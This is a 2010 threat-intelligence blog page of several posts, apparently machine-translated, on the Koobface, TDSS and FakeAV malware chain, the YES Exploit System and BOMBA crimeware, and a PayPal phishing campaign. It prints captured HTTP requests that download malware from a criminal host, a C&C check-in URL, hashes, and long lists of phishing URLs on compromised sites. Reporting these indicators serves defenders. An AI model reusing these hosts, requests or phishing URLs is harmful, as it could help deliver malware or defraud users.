MalwareIntelligence is a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.

25.7.10

Circuit Koobface from 91.188.59.10 (BKCNET "SIA" IZZI)

After several months without news of Koobface, at least on typical propagation using as cover to attack the classic fake YouTube screen, is back with another season of propagation.

This time, its spread continues through visual social engineering, but not in the template of course YouTube video but uses a page with pornographic content.


As shown in the catch, when you attempt to access any of the assumptions videos, a small window warns about the need to download a codec. By accepting, you download Koobface under the cover of a binary call codec.exe (5910e59d592781cec3234abf57f8d000), from IP address 91.188.59.10 that resolves domain 1zabslwvn538n4i5tcjl.com. This IP is used for the propagation of Koobface since March 2010.

In addition, the page contains an embedded script that redirects traffic to download a PDF file that contains an exploit for CVE-2008-2992.


Also at the same IP but makes it clear that his administration is being performed through a known crimeware: YES Exploit System.


The binary executable codec.exe is packed with UPX (UPX 0.89.6 - 1.02/1.05-1.22 -> Markus&Laszlo). When you turn generates a BAT (she committed suicide) with instructions to C&C, providing access to 1zabslwvn538n4i5tcjl.com from which drops the following malicious code:
  • wsc.exe (80427b754b11de653758dd5e1ba3de1c) Koobface
  • dm.exe (b658d9b812454e99b2915ab2e9594b94) TDSS

GET /dm.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 1zabslwvn538n4i5tcjl.com
Connection: Keep-Alive

GET /wsc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 1zabslwvn538n4i5tcjl.com
Connection: Keep-Alive

The BAT contains the following statement of connection and sending information to C&C:

http://urodinam.net/33t.php?stime=1280078675

This domain is on the same IP address 91.188.59.10 with instructions to download other malware:
  • pi.exe (08f214c0bd61faba2f8ed89cb8f40bc0) FakeAV

This is a rogue copy of Security essentials 2010. It connects to getexepizdec.com (91.188.59.211) from which it downloads the file firewall.dll (a0160e8ede623b1df7d677b8d52fdc48) and getmsdfgee54.com (88.80.4.19) from which it downloads exe.exe (5839ca78aab96724aa646789ebc24305 - Olmarik) with a very low detection rate.

In short, the circuit that runs koobface from BKCNET "SIA" IZZI involves different parts of the area of crime that are interrelated to each other with the same goal: $$$$$ (feedback to the underground economy), leaving behind a real portfolio malware.

Under 91.188.59.10 is managed by a known crimeware costing underground market around $ 1000 and to be executed in charge of pointing the download of other malware on the victim computer, managed under the coordination of business members that increase their profits for each successful installation of the rogue.

Related information
Symbiosis malware present. Koobface
Koobface campaign spread through Blogspot
YES Exploit System and Crimeware-as-a-Service
YES Exploit System. Official Business Partner’s

Ver más

0 comentarios

16.7.10

Defacement by "Exploit Pack's"

Defacing attacks, generally attributed to the activities of hacktivism and often called "script kiddies" (although now I think what best describes this kind of bad guys is: aspirant to criminals), passed the criminal background as a sort of whim or complaint against some exploit's pack who have certain vulnerabilities and has already begun to see some examples. However, this does not cut the criminal activities of this botmaster.

The image below shows it’s a "Blind Defacements" against Eleonore Exploit Pack, which means that it can only be viewed using the following botmaster circumvent the authentication process:

In the following case (found by Francisco Ruiz of MalwareIntelligence team), the defacing was made against a SpyEye.

Otros crimeware que podrían ser propensos a esto son:
Among the research community could say that look for vulnerabilities in the crimeware is a common activity and even as a hobby if I may say, aimed at any point of view is to make a defacing. With no doubt, the competition between "fans" of certain crimeware, "patriots" seeking annoy criminal activities by country of origin and other computer thieves who steal "clients" to other thieves computer is becoming extra activities within the ecosystem crime.

Related information
YES Exploit System and Crimeware-as-a-Service
State of the art in Eleonore Exploit Pack IISpyEye Bot (Part two). Conversations with the creator of crimeware
Liberty Exploit System. Otra alternativa crimeware para el control de botnets
ZoPAck. Nueva alternativa para la explotación de vulnerabilidades

Ver más

0 comentarios

11.7.10

YES Exploit System and Crimeware-as-a-Service

In recent years the phenomenon Cloud Computing has become a real turning point as far as information security is concerned, the main focus of controversy does not pass both protection mechanisms that can reach their architectures implemented on but more round about the lack of trust still exists on who should take the decisions necessary to implement this style services.

However, undoubtedly, for offenders Cloud Computing security isn't a problem or a constraint to further fuel the underground economy and, in some ways to adapt this technology to offer alternatives "differential" in the competitive scenario posed by crimeware business.

YES Exploit System, one of many systems to automate the exploitation of vulnerabilities to recruit zombies, poses just that.

Using a schema from the visual point of view has nothing to envy to any of the operating systems are supported and used by "the cloud", is confined solely to provide the necessary options for the activities of criminals interest loa . Which makes it clear that the developers of these applications are fully aware of their criminal needs "clients."

Even implementing mechanisms counterintelligence whose objectives are to, first, check the reputation of the domain (Domain checker) used for maneuvers criminal automatically checked against the main services that are responsible for adding a database of URL's fraudulent; including ZeuS Tracker, friends of MDL (MalwareDomainList), SiteAdvisor, Norton List, etc., besides being able to manually add any other default not included manipulating the code of certain files.

On the other, checking the integrity of malware spread (AV Checker). Both "criminal remedies" born as a result of high growth and demand for these types of crimeware.

One of the latest campaigns through the latest YES Exploit System was the spread of family ransomware seen in the image:

Chronologically speaking, this crimeware has three generations and the business model was no longer just a matter operated from hiding underground to certain forums, in addition, make sales through partners, via the web and using as the main channel Communication: ICQ.


YES Exploit System closely resembles a conventional business scheme but designed exclusively for criminal purposes. Even if we consider that among the many resources generated to support the already crimeware (DBaaS) DataBase-as-a-Service should not be surprised to find among the research process, the support of the "customer base" of YES-ES (or otherwise), also from "the cloud" and hosted by a "third."

Related information
YES Exploit System. Manipulando la seguridad del atacante
YES Exploit System. Otro crimeware made in Rusia

Ver más

0 comentarios

4.7.10

PayPal phishing campaign by "Newbie Hacker Community"

Phishing attacks are increasingly common and are no longer confined as in the beginning to use as cover only banks, and any service offered over the Internet and requires username and password, sooner or later will be grounds target for criminals.

PayPal isn't a new service and was one of the first to offer e-commerce services, whose image is one of the most commonly used for phishing. Starting today, July 4 (Independence Day U.S.) has been active phishing a massive campaign against PayPal.

Some of the addresses used are:

211.233.89.211/~kesalos7/bbs/data/fr/error_login.html
383-1330.com/~kesalos7/bbs/data/fr/error_login.html
93awing.com/~kesalos7/bbs/data/fr/error_login.html
actflash.com/~kesalos7/bbs/data/fr/error_login.html
amitabulpgm.com/~kesalos7/bbs/data/fr/error_login.html
amusespace.com/~kesalos7/bbs/data/fr/error_login.html
apeopleday.com/~kesalos7/bbs/data/fr/error_login.html
balloonnet.org/~kesalos7/bbs/data/fr/error_login.html
bizmarkorea.com/~kesalos7/bbs/data/fr/error_login.html
booknanum.org/~kesalos7/bbs/data/fr/error_login.html
bracetech.co.kr/~kesalos7/bbs/data/fr/error_login.html
camwiz.com/~kesalos7/bbs/data/fr/error_login.html
cellclinic.net/~kesalos7/bbs/data/fr/error_login.html
creinno.net/~kesalos7/bbs/data/fr/error_login.html
daeguubf.org/~kesalos7/bbs/data/fr/error_login.html
dicworld.com/~kesalos7/bbs/data/fr/error_login.html
dongilled.net/~kesalos7/bbs/data/fr/error_login.html
dreamfancy.com/~kesalos7/bbs/data/fr/error_login.html
edusun.or.kr/~kesalos7/bbs/data/fr/error_login.html
ejacademy.net/~kesalos7/bbs/data/fr/error_login.html
eng.teletron.co.kr/~kesalos7/bbs/data/fr/error_login.html
eng.uju.com/~kesalos7/bbs/data/fr/error_login.html
epsdent.com/~kesalos7/bbs/data/fr/error_login.html
eqmath.com/~kesalos7/bbs/data/fr/error_login.html
e-somci.com/~kesalos7/bbs/data/fr/error_login.html
espacenkw.com/~kesalos7/bbs/data/fr/error_login.html
eunhyoung.com/~kesalos7/bbs/data/fr/error_login.html
faview.com/~kesalos7/bbs/data/fr/error_login.html
filetook.com/~kesalos7/bbs/data/fr/error_login.html
foodok.net/~kesalos7/bbs/data/fr/error_login.html
gtipm.com/~kesalos7/bbs/data/fr/error_login.html
hamonkorea.com/~kesalos7/bbs/data/fr/error_login.html
hapoom.net/~kesalos7/bbs/data/fr/error_login.html
hunkihong.com/~kesalos7/bbs/data/fr/error_login.html
ibang.net/~kesalos7/bbs/data/fr/error_login.html
iconpos.com/~kesalos7/bbs/data/fr/error_login.html
i-ekc.com/~kesalos7/bbs/data/fr/error_login.html
ifnotall.com/~kesalos7/bbs/data/fr/error_login.html
ihavetwoson.com/~kesalos7/bbs/data/fr/error_login.html
imflavor.com/~kesalos7/bbs/data/fr/error_login.html
inskyc.net/~kesalos7/bbs/data/fr/error_login.html
jangmiwon.com/~kesalos7/bbs/data/fr/error_login.html
jinsungtech.net/~kesalos7/bbs/data/fr/error_login.html
jiwontech.com/~kesalos7/bbs/data/fr/error_login.html
jobusa.kr/~kesalos7/bbs/data/fr/error_login.html
kafe.or.kr/~kesalos7/bbs/data/fr/error_login.html
kesalos7.com/~kesalos7/bbs/data/fr/error_login.html
koreachurch.or.kr/~kesalos7/bbs/data/fr/error_login.html
krgs.org/~kesalos7/bbs/data/fr/error_login.html
linux-one.host114.com/~kesalos7/bbs/data/fr/error_login.html
risingfun.net/~kesalos7/bbs/data/fr/error_login.html
threeecologies.com/~kesalos7/bbs/data/fr/error_login.html
ufoet.com/~kesalos7/bbs/data/fr/error_login.html
ujukfc.jp/~kesalos7/bbs/data/fr/error_login.html
unistorybook.com/~kesalos7/bbs/data/fr/error_login.html
wakojeonnam.org/~kesalos7/bbs/data/fr/error_login.html

Behind these attacks was a group of criminals who under the name "Newbie Hacker Community" is the campaign against phishing.

The Defacing seen in the image is as a seal of the executives in each of the sites involved which holds the fake PayPal page along with the fraudulent file package.

Updated 04.07.2010
New active domains. Unlike the first "litter" of vulnerable sites, in this case the phishing package is housed in the folder /~radiocon/ and all they implanted a backdoor (PHP Shell) through uk.php file.


 
4dalove.org/~radiocon/security-cod/webscr.php
4less.tv/~radiocon/security-cod/webscr.php
64.6.241.8/~radiocon/security-cod/webscr.php
64.6.242.186/~radiocon/security-cod/webscr.php
64.6.242.50/~radiocon/security-cod/webscr.php
64.6.242.60/~radiocon/security-cod/webscr.php
64.6.242.78/~radiocon/security-cod/webscr.php
64.6.243.76/~radiocon/security-cod/webscr.php
888sandngravel.com/~radiocon/security-cod/webscr.php
aa.org/~radiocon/security-cod/webscr.php
aama.com.ar/~radiocon/security-cod/webscr.php
aikiti.ch/~radiocon/security-cod/webscr.php
alasparalamente.com.ar/~radiocon/security-cod/webscr.php
anthonybabyska.com/~radiocon/security-cod/webscr.php
arthaus.us/~radiocon/security-cod/webscr.php
b2bwebcreations.com/~radiocon/security-cod/webscr.php
badboybulls.com/~radiocon/security-cod/webscr.php
behlafamily.com/~radiocon/security-cod/webscr.php
benny.co.za/~radiocon/security-cod/webscr.php
bigmindrecords.com/~radiocon/security-cod/webscr.php
blakelybears.org/~radiocon/security-cod/webscr.php
box2.host1free.com/~barbad/emikrazie/update.php
breathoflifetribe.com/~radiocon/security-cod/webscr.php
buckinbull.com/~radiocon/security-cod/webscr.php
buschdesign.com/~radiocon/security-cod/webscr.php
buy4less.ch/~radiocon/security-cod/webscr.php
cabvideoproductions.com/~radiocon/security-cod/webscr.php
caercdelu.org.ar/~radiocon/security-cod/webscr.php
cairncomm.com/~radiocon/security-cod/webscr.php
calculusproductions.com/~radiocon/security-cod/webscr.php
call-complete.com/~radiocon/security-cod/webscr.php
caminosdelser.com.ar/~radiocon/security-cod/webscr.php
canyonconveying.com/~radiocon/security-cod/webscr.php
casagueroonline.com/~radiocon/security-cod/webscr.php
casatrend.com/~radiocon/security-cod/webscr.php
ccflecuador.com/~radiocon/security-cod/webscr.php
centurysecuritypa.com/~radiocon/security-cod/webscr.php
championship.ch/~radiocon/security-cod/webscr.php
championshipsports.com/~radiocon/security-cod/webscr.php
chhetrylaw.com/~radiocon/security-cod/webscr.php
citizenworld.co.za/~radiocon/security-cod/webscr.php
clubalouette.ca/~radiocon/security-cod/webscr.php
complejo-corralito.com.ar/~radiocon/security-cod/webscr.php
complejolasmoras.com.ar/~radiocon/security-cod/webscr.php
congresodeturismodeentrerios.com/~radiocon/security-cod/webscr.php
corporatecolors.net/~radiocon/security-cod/webscr.php
costantinorocca-golfacademy.com/~radiocon/security-cod/webscr.php
cybertrek.co.za/~radiocon/security-cod/webscr.php
cybertrek.org/~radiocon/security-cod/webscr.php
danielcarbone.com.ar/~radiocon/security-cod/webscr.php
danielhoc.com.ar/~radiocon/security-cod/webscr.php
didjrhythm.com/~radiocon/security-cod/webscr.php
digimael.com/~radiocon/security-cod/webscr.php
donaldgrogers.com/~radiocon/security-cod/webscr.php
dougbusch.com/~radiocon/security-cod/webscr.php
ecuadoralaventa.com/~radiocon/security-cod/webscr.php
elegantmoments.com/~radiocon/security-cod/webscr.php
elpatoviganoni.com.ar/~radiocon/security-cod/webscr.php
emilioflores.com/~radiocon/security-cod/webscr.php

ericlawtonlaw.com/~radiocon/security-cod/webscr.php
ericlawtonphotography.com/~radiocon/security-cod/webscr.php
escueladeparteras.com.ar/~radiocon/security-cod/webscr.php
estimulosadecuados.com.ar/~radiocon/security-cod/webscr.php
everydaygandhis.org/~radiocon/security-cod/webscr.php
exclusiveflowersecuador.com/~radiocon/security-cod/webscr.php
faltlaw.com/~radiocon/security-cod/webscr.php
familyaffair.us/~radiocon/security-cod/webscr.php
fire-xpert.com/~radiocon/security-cod/webscr.php
fotoclub-capriasca.ch/~radiocon/security-cod/webscr.php
fullmoonrisingmusic.com/~radiocon/security-cod/webscr.php
gharekabab.com/~radiocon/security-cod/webscr.php
grupoprovedatos.com/~radiocon/security-cod/webscr.php
hamsterworks.com/~radiocon/security-cod/webscr.php
hartbuilt.com/~radiocon/security-cod/webscr.php
housedatabank.com/~radiocon/security-cod/webscr.php
http://danziskie.com/~radiocon/security-cod/webscr.php
hydro-marine.com/~radiocon/security-cod/webscr.php
hydro-marine.net/~radiocon/security-cod/webscr.php
imageavpro.com/~radiocon/security-cod/webscr.php
immigrationattorney.org/~radiocon/security-cod/webscr.php
ismit.com/~radiocon/security-cod/webscr.php
jalanjalanimports.com/~radiocon/security-cod/webscr.php
jeffandlynette.com/~radiocon/security-cod/webscr.php
jessebarish.com/~radiocon/security-cod/webscr.php
jimmiewalden.com/~radiocon/security-cod/webscr.php
jletecnologiasweb.com/~radiocon/security-cod/webscr.php
jojoalves.com/~radiocon/security-cod/webscr.php
kaminimusic.com/~radiocon/security-cod/webscr.php
khasskhass.com/~radiocon/security-cod/webscr.php
kinggraphics.com/~radiocon/security-cod/webscr.php
lactancia.com.ar/~radiocon/security-cod/webscr.php
latinrootstravel.com/~radiocon/security-cod/webscr.php
lexafina.com/~radiocon/security-cod/webscr.php
liberaldemocracynepal.org/~radiocon/security-cod/webscr.php
libra-indumentaria.com.ar/~radiocon/security-cod/webscr.php
liveforspeed.ch/~radiocon/security-cod/webscr.php
loveastruth.com/~radiocon/security-cod/webscr.php
mailrise.net/~radiocon/security-cod/webscr.php
malcantone.com/~radiocon/security-cod/webscr.php
malibusound.com/~radiocon/security-cod/webscr.php
merrychristmas.ch/~radiocon/security-cod/webscr.php
michaelmolluramusic.com/~radiocon/security-cod/webscr.php
movisocialmisiones.com.ar/~radiocon/security-cod/webscr.php
mpscomex.com.ar/~radiocon/security-cod/webscr.php
mujersabia.com.ar/~radiocon/security-cod/webscr.php
multinacionaltransportadora.com/~radiocon/security-cod/webscr.php
municaseros.gov.ar/~radiocon/security-cod/webscr.php
myaccount.elegantmoments.com/~radiocon/security-cod/webscr.php
nepalcouncil.org/~radiocon/security-cod/webscr.php
nepalembassyusa.org/~radiocon/security-cod/webscr.php
nepaliman.com/~radiocon/security-cod/webscr.php
nepalstudycenter.org/~radiocon/security-cod/webscr.php
nepaltvusa.com/~radiocon/security-cod/webscr.php
network.b2bwebcreations.com/~radiocon/security-cod/webscr.php
novaggio.com/~radiocon/security-cod/webscr.php
nrn.nepalcouncil.org/~radiocon/security-cod/webscr.php
nufaro.com/~radiocon/security-cod/webscr.php
oddandrandom.com/~radiocon/security-cod/webscr.php
okolexproperties.com/~radiocon/security-cod/webscr.php
onelovebeauty.net/~radiocon/security-cod/webscr.php
padreswaldorf.com.ar/~radiocon/security-cod/webscr.php
passiveincomesecrets.com/~radiocon/security-cod/webscr.php
pearlregmifineart.com/~radiocon/security-cod/webscr.php
pelusolandi.com/~radiocon/security-cod/webscr.php
peppesbest.com/~radiocon/security-cod/webscr.php
perraultcorp.com/~radiocon/security-cod/webscr.php
phoolbari.com/~radiocon/security-cod/webscr.php
photo.com/~radiocon/security-cod/webscr.php
pogplace.com/~radiocon/security-cod/webscr.php
premraja.com/~radiocon/security-cod/webscr.php
prewiringlaredo.com/~radiocon/security-cod/webscr.php
produccionesdelsol.com/~radiocon/security-cod/webscr.php
publicidadmontanana.com.ar/~radiocon/security-cod/webscr.php
publinetwork.ch/~radiocon/security-cod/webscr.php
puertopiapsa.com/~radiocon/security-cod/webscr.php
qmbsales.com.au/~radiocon/security-cod/webscr.php
radio9fm.com.ar radio9fm.com.ar/~radiocon/security-cod/webscr.php
radiodovaan.com/~radiocon/security-cod/webscr.php
rajeshshakya.com/~radiocon/security-cod/webscr.php
ranchometals.com/~radiocon/security-cod/webscr.php
redgfu.org.ar/~radiocon/security-cod/webscr.php
ristoranteilcastagneto.com/~radiocon/security-cod/webscr.php
robinbvance.com/~radiocon/security-cod/webscr.php
ronyentertainment.com/~radiocon/security-cod/webscr.php
russiancultureinnepal.org/~radiocon/security-cod/webscr.php
sagarmathatv.us/~radiocon/security-cod/webscr.php
saharapc.com/~radiocon/security-cod/webscr.php
selfdefencesecrets.com/~radiocon/security-cod/webscr.php
sharmilauprety.com/~radiocon/security-cod/webscr.php
shilohouse.org/~radiocon/security-cod/webscr.php
shopmynepa.com/~radiocon/security-cod/webscr.php
showbizconsultants.com/~radiocon/security-cod/webscr.php
silverwingsmultimedia.com/~radiocon/security-cod/webscr.php
simracing.ch/~radiocon/security-cod/webscr.php
siyavuya.com/~radiocon/security-cod/webscr.php
skoz.net/~radiocon/security-cod/webscr.php
slpkorea.com/~radiocon/security-cod/webscr.php
soniacavia.com.ar/~radiocon/security-cod/webscr.php
sonicfarm.com/~radiocon/security-cod/webscr.php
starsonstageinc.com/~radiocon/security-cod/webscr.php
sunboonitiri.com/~radiocon/security-cod/webscr.php
superlarge.com/~radiocon/security-cod/webscr.php
tabmanagement.com/~radiocon/security-cod/webscr.php
teatroelatajo.com.ar/~radiocon/security-cod/webscr.php
thebridgenetwork.org/~radiocon/security-cod/webscr.php
thehimalayanhouse.com/~radiocon/security-cod/webscr.php
thevillageii.com/~radiocon/security-cod/webscr.php
tierrasdelacienaga.com.ar/~radiocon/security-cod/webscr.php
timelessimagesofisrael.com/~radiocon/security-cod/webscr.php
tonicomsa.com/~radiocon/security-cod/webscr.php
topangacollective.com/~radiocon/security-cod/webscr.php
tplenterprises.com/~radiocon/security-cod/webscr.php
trancasturtlerescue.com/~radiocon/security-cod/webscr.php
truewordofgodchurch.org/~radiocon/security-cod/webscr.php
turnkeywebmasters.net/~radiocon/security-cod/webscr.php
ucruruguay.com.ar/~radiocon/security-cod/webscr.php
unseenpictures.com/~radiocon/security-cod/webscr.php
uomo.ch/~radiocon/security-cod/webscr.php
usatoyou.com/~radiocon/security-cod/webscr.php
varietytrucksales.com/~radiocon/security-cod/webscr.php
vergogna.ch/~radiocon/security-cod/webscr.php
virtualcar.ch/~radiocon/security-cod/webscr.php
waterfordav.com/~radiocon/security-cod/webscr.php
webfixnow.com/~radiocon/security-cod/webscr.php
wigbeauty.co.za/~radiocon/security-cod/webscr.php
wigbeauty.com/~radiocon/security-cod/webscr.php
winonline.co.za/~radiocon/security-cod/webscr.php
wowwomenontopoftheworld.com/~radiocon/security-cod/webscr.php
wvpatransport.com/~radiocon/security-cod/webscr.php
xkeep.net/~radiocon/security-cod/webscr.php

Related information
Besouro film website violated, PayPal phishing attacks
Campaign phishing to Claro Argentina
Phishing database VI
Web Hooters Germany committed to phishing HSBC
New phishing campaign against Facebook led by Zeus
Phishing campaign aimed at players Zynga
Dissection of a fraudulent package. Wachovia phishing attack

Ver más

0 comentarios

3.7.10

BOMBA Botnet. New alternative crimeware fuel the economy criminal

In a recent survey, Francisco Ruiz, Crimeware Researcher of MalwareIntelligence, broke through the security barriers of a new recruit crimeware designed to automate the running zombies and mass and scale of cyber crimes that are carried out using a vector of attack committed teams as part of the botnet.

These BOMBA, which is accessed via web and which authentication system is based only on the requirement of a password, an access system adopted by many applications of this kind between highlighting Phoenix Exploit's Kit and n0ise Bot.


The server that hosts this crimeware has base in Latvia (although the administrative record is in Moscow, Russia) under the AS6851 (Autonomous System) which is known as the network BKCNET "SIA" Izzie.

ASN This server is listed as criminal activities such as the spread of rogue, shelter kits and other YES Exploit System, in 2009 I host the strategies of the botnet Waledac (successor to Storm), ZeuS and also to have direct relationship with criminals who are behind the maneuvers of the botnet Koobface.


The package is designed to exploit vulnerabilities through the family of Microsoft operating systems, as shown in the illustration below, Windows XP, Windows Vista and Windows Seven, and through precompiled exploits to exploit vulnerabilities in Java (Java Deployment Toolkit ), Internet Explorer, Adobe Reader and the classic MDAC.

While it does not pose an alternative complex in structure, no longer a serious threat adds to demand criminal and inserted into the circuit of illegal actions.

Related Information

Ver más

1 comentarios

Subscribe to: Posts (Atom)